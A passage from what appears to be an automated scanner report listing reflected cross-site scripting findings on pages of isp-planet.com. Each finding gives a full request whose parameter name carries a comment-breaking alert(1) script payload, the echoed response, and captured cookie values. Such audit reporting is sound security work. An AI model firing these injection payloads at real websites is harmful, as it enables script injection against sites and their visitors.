Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:13:39 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 15:14:39 GMT
Connection: close
Content-Type: text/html
Content-Length: 55541

<HTML>
<HEAD>
<TITLE>ISP Planet - Resources - State PUC Directory </TITLE>
<META NAME="description" CONTENT="information on information and resources for ISPs">
<META NAME="channel" CONTENT="ISP Resou
...[SNIP]...
<!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1
url: /resources/directories/state_puc.html?bcad3--><script>alert(1)</script>5f359aca2e4=1 -->
...[SNIP]...

3.87. http://www.isp-planet.com/resources/how_to/index.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.isp-planet.com
Path:   /resources/how_to/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload b8237--><script>alert(1)</script>824980c5358 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /resources/how_to/index.html?b8237--><script>alert(1)</script>824980c5358=1 HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:13:20 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 15:14:20 GMT
Connection: close
Content-Type: text/html
Content-Length: 50140

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"
           "http://www.w3.org/TR/REC-html40/loose.dtd">
<HTML>
<HEAD>
   <TITLE>ISP-Planet - Resources - Index.html</TITLE>
<link rel="stylesheet" h
...[SNIP]...
<!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1
url: /resources/how_to/index.html?b8237--><script>alert(1)</script>824980c5358=1 -->
...[SNIP]...

3.88. http://www.isp-planet.com/resources/index.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.isp-planet.com
Path:   /resources/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 12656--><script>alert(1)</script>70658e982ea was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /resources/index.html?12656--><script>alert(1)</script>70658e982ea=1 HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:13:01 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 15:14:01 GMT
Connection: close
Content-Type: text/html
Content-Length: 42918

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"
           "http://www.w3.org/TR/REC-html40/loose.dtd">
<HTML><HEAD>
<TITLE>ISP-Planet - Resources </TITLE>
<META NAME="description" CONTENT="info
...[SNIP]...
<!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1
url: /resources/index.html?12656--><script>alert(1)</script>70658e982ea=1 -->
...[SNIP]...

3.89. http://www.isp-planet.com/resources/index_lawyer.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.isp-planet.com
Path:   /resources/index_lawyer.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 64e48--><script>alert(1)</script>f0377a27e76 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /resources/index_lawyer.html?64e48--><script>alert(1)</script>f0377a27e76=1 HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:13:03 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 15:14:03 GMT
Connection: close
Content-Type: text/html
Content-Length: 51255

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"
           "http://www.w3.org/TR/REC-html40/loose.dtd">
<HTML>
<HEAD>
   
<TITLE>ISP Planet - Resources - ISP Planet's List of Internet Lawyers</TIT
...[SNIP]...
<!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1
url: /resources/index_lawyer.html?64e48--><script>alert(1)</script>f0377a27e76=1 -->
...[SNIP]...

3.90. http://www.isp-planet.com/resources/isp_guide/index.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.isp-planet.com
Path:   /resources/isp_guide/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 8cb82--><script>alert(1)</script>eaba82c6736 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /resources/isp_guide/index.html?8cb82--><script>alert(1)</script>eaba82c6736=1 HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:13:38 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 15:14:38 GMT
Connection: close
Content-Type: text/html
Content-Length: 58306

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"
           "http://www.w3.org/TR/REC-html40/loose.dtd">
<HTML>
<HEAD>
   
<TITLE>ISP Planet - Resources - Guide to Building an ISP</TITLE>
   
   <META
...[SNIP]...
<!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1
url: /resources/isp_guide/index.html?8cb82--><script>alert(1)</script>eaba82c6736=1 -->
...[SNIP]...

3.91. http://www.isp-planet.com/services/asguide/index.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.isp-planet.com
Path:   /services/asguide/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload df0d8--><script>alert(1)</script>87a31f9fe67 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /services/asguide/index.html?df0d8--><script>alert(1)</script>87a31f9fe67=1 HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:13:36 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 15:14:36 GMT
Connection: close
Content-Type: text/html
Content-Length: 93557

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"
           "http://www.w3.org/TR/REC-html40/loose.dtd">
<HTML>
<HEAD>
<title>ISP-Planet - Value-Added Services - Anti-Spam Directory </title>
...[SNIP]...
<!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1
url: /services/asguide/index.html?df0d8--><script>alert(1)</script>87a31f9fe67=1 -->
...[SNIP]...

3.92. http://www.isp-planet.com/services/billing/chart.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.isp-planet.com
Path:   /services/billing/chart.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload b9e0f--><script>alert(1)</script>fd5147eb06f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /services/billing/chart.html?b9e0f--><script>alert(1)</script>fd5147eb06f=1 HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:13:36 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 15:14:36 GMT
Connection: close
Content-Type: text/html
Content-Length: 101988

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"
           "http://www.w3.org/TR/REC-html40/loose.dtd">
<HTML>
<HEAD>
<TITLE>ISP-Planet - Value-Added Services - Billing Service Directory Quick R
...[SNIP]...
<!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1
url: /services/billing/chart.html?b9e0f--><script>alert(1)</script>fd5147eb06f=1 -->
...[SNIP]...

3.93. http://www.isp-planet.com/services/billing/index.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.isp-planet.com
Path:   /services/billing/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 80cb4--><script>alert(1)</script>f89dfcaeda7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /services/billing/index.html?80cb4--><script>alert(1)</script>f89dfcaeda7=1 HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:13:11 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 15:14:11 GMT
Connection: close
Content-Type: text/html
Content-Length: 42189

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"
           "http://www.w3.org/TR/REC-html40/loose.dtd">
<HTML>
<HEAD>
<TITLE>ISP-Planet - Value-Added Services - Billing Service Directory</title>
...[SNIP]...
<!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1
url: /services/billing/index.html?80cb4--><script>alert(1)</script>f89dfcaeda7=1 -->
...[SNIP]...

3.94. http://www.isp-planet.com/services/custsupport/chart.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.isp-planet.com
Path:   /services/custsupport/chart.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 6d7a2--><script>alert(1)</script>5b648993c12 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /services/custsupport/chart.html?6d7a2--><script>alert(1)</script>5b648993c12=1 HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:13:42 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 15:14:42 GMT
Connection: close
Content-Type: text/html
Content-Length: 113672

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"
           "http://www.w3.org/TR/REC-html40/loose.dtd">
<HTML>
<HEAD>
<TITLE>ISP-Planet - Value-Added Services - Outsourced Customer Support D
...[SNIP]...
<!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1
url: /services/custsupport/chart.html?6d7a2--><script>alert(1)</script>5b648993c12=1 -->
...[SNIP]...

3.95. http://www.isp-planet.com/services/custsupport/index.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.isp-planet.com
Path:   /services/custsupport/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 8ec51--><script>alert(1)</script>26fc08aec09 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /services/custsupport/index.html?8ec51--><script>alert(1)</script>26fc08aec09=1 HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:13:39 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 15:14:39 GMT
Connection: close
Content-Type: text/html
Content-Length: 58569

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"
           "http://www.w3.org/TR/REC-html40/loose.dtd">
<HTML>
<HEAD>
<TITLE>ISP-Planet - Value-Added Services - Outsourced Customer Support D
...[SNIP]...
<!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1
url: /services/custsupport/index.html?8ec51--><script>alert(1)</script>26fc08aec09=1 -->
...[SNIP]...

3.96. http://www.isp-planet.com/services/ids/chart.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.isp-planet.com
Path:   /services/ids/chart.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 746b8--><script>alert(1)</script>c8b224d10e9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /services/ids/chart.html?746b8--><script>alert(1)</script>c8b224d10e9=1 HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:13:40 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 15:14:40 GMT
Connection: close
Content-Type: text/html
Content-Length: 84675

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"
           "http://www.w3.org/TR/REC-html40/loose.dtd">
<HTML>
<HEAD>
<TITLE>ISP-Planet - Value-Added Services - Intrusion Detection Systems Q
...[SNIP]...
<!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1
url: /services/ids/chart.html?746b8--><script>alert(1)</script>c8b224d10e9=1 -->
...[SNIP]...

3.97. http://www.isp-planet.com/services/ids/index.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.isp-planet.com
Path:   /services/ids/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload fbb17--><script>alert(1)</script>619ad1475d6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /services/ids/index.html?fbb17--><script>alert(1)</script>619ad1475d6=1 HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:13:21 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 15:14:21 GMT
Connection: close
Content-Type: text/html
Content-Length: 42637

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"
           "http://www.w3.org/TR/REC-html40/loose.dtd">
<HTML>
<HEAD>
<TITLE>ISP-Planet - Value-Added Services - Intrusion Detection Systems D
...[SNIP]...
<!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1
url: /services/ids/index.html?fbb17--><script>alert(1)</script>619ad1475d6=1 -->
...[SNIP]...

3.98. http://www.isp-planet.com/services/merchants/index.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.isp-planet.com
Path:   /services/merchants/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 245cd--><script>alert(1)</script>77839477c8c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /services/merchants/index.html?245cd--><script>alert(1)</script>77839477c8c=1 HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:13:42 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 15:14:42 GMT
Connection: close
Content-Type: text/html
Content-Length: 57052

<HTML>
<HEAD>
<title>ISP-Planet - Value-Added Services - Merchant Account Providers Directory</title>
<meta name="channel" content="ISP Resources">
<meta name="author" content="Jeff Goldman">
<me
...[SNIP]...
<!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1
url: /services/merchants/index.html?245cd--><script>alert(1)</script>77839477c8c=1 -->
...[SNIP]...

3.99. http://www.isp-planet.com/services/registrars/chart.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.isp-planet.com
Path:   /services/registrars/chart.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload bf16b--><script>alert(1)</script>fe099ef085d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /services/registrars/chart.html?bf16b--><script>alert(1)</script>fe099ef085d=1 HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:13:39 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 15:14:39 GMT
Connection: close
Content-Type: text/html
Content-Length: 85677

<HTML>
<HEAD>
<TITLE>ISP-Planet - Value-Added Services - Registrar Directory</title>
<meta name="channel" content="ISP Resources">
<meta name="author" content="ISP-Planet Staff">
<meta name="company"
...[SNIP]...
<!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1
url: /services/registrars/chart.html?bf16b--><script>alert(1)</script>fe099ef085d=1 -->
...[SNIP]...

3.100. http://www.isp-planet.com/services/registrars/index.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.isp-planet.com
Path:   /services/registrars/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload a1f04--><script>alert(1)</script>16711f55bfb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

